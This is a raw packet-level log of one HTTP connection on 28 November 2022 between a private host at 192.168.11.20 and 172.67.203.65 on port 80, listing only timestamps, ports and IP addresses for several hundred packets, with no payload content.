Nov 28, 2022 12:46:58.291239977 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291249990 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291260004 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291270971 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291280985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291291952 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291302919 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291313887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291343927 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291354895 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291366100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291377068 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291387081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291398048 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291404963 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.291512966 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.291598082 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291608095 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.291872025 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.323821068 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.323946953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.323962927 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.323976994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324016094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324028969 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324039936 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.324040890 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324053049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324064970 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324076891 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324088097 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324100018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324111938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324120045 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.324122906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324135065 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324146032 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324172974 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324184895 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324198961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324212074 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324223995 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324228048 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.324235916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324246883 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324270964 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324282885 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324299097 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.324332952 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324345112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324353933 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.324357033 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324369907 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324388027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324399948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324429989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324482918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324496031 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324507952 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324523926 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324537039 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324548960 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324569941 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.324579954 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324592113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324606895 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324619055 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324623108 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.324631929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324642897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324655056 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324666977 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324678898 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324691057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324703932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324738979 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324739933 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.324752092 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324767113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324781895 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324794054 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324805975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324822903 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324836016 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324847937 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324861050 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324872971 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324884892 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324896097 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324903011 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.324908018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324919939 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324932098 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324944019 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324954987 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324966908 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324979067 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324990034 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.324992895 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.325001955 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.325014114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.325025082 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.325037003 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.325048923 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.325062990 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.325181007 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.325280905 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.325388908 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.325558901 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.325694084 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.378339052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378432035 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378444910 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378457069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378479004 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378489971 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378500938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378516912 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.378528118 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378566027 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.378587961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378598928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378609896 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378621101 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378632069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378633976 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.378643036 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378653049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378665924 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378678083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378715038 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378726006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378736973 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378748894 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378762007 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378772974 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378782988 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378793955 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378809929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.378885984 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.378993034 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.379020929 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379031897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379043102 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379054070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379064083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379075050 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379086971 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379103899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379115105 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379126072 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379136086 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379147053 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379158020 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379168987 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379179001 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379189968 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379193068 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.379200935 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379211903 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379223108 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379232883 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379245043 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379255056 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379265070 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.379266024 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379281044 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379292011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379302025 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379388094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379400015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379410028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379420996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379431963 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379442930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379453897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379465103 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379475117 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379479885 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.379486084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379496098 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379507065 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379518032 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379528046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379539013 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379549026 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379559994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379561901 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.379570007 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379580975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379590988 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379601955 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379633904 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379645109 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379656076 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379667044 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379678011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379688978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379698992 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379708052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379719019 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379729986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379740000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379750967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379761934 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379767895 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.379771948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379782915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379796982 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379807949 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379818916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379828930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379839897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379839897 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.379851103 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379862070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379889965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379900932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379910946 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379921913 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379933119 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379942894 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379954100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379956007 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.379971027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379982948 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.379992962 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380004883 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380017042 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380028009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380038023 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380048990 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380065918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380079031 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380089045 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380100012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380115986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380127907 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380146027 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.380150080 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380163908 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380175114 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380186081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380196095 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380204916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380215883 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380225897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380237103 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380247116 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380253077 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.380259037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380269051 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.380475044 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.380564928 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.391516924 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391683102 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.391794920 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391808033 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391822100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391834021 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391845942 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391856909 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391869068 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391880035 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391891956 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391904116 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391916037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391917944 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.391927004 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391938925 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391949892 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391962051 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391966105 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.391973972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.391984940 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392002106 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392036915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392052889 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.392062902 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392075062 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392203093 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392214060 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.392215967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392230034 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392240047 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392251968 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392262936 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392275095 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392287016 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392297983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392334938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392347097 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392370939 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392373085 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.392373085 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.392373085 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.392383099 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392394066 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392405033 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392421961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392432928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392443895 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392457008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392471075 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.392471075 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.392546892 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.392608881 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.397247076 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397454023 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397464991 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397469997 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.397475958 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397486925 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397497892 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397507906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397519112 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397530079 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397540092 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397551060 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397562027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397572994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397583008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397587061 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.397593975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397603989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397614956 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397625923 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397635937 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397648096 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397677898 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.397747040 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.397833109 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.397866011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397876978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397887945 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397897959 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397908926 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397917986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397928953 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.397938967 CET	80	49836	172.67.203.65	192.168.11.20
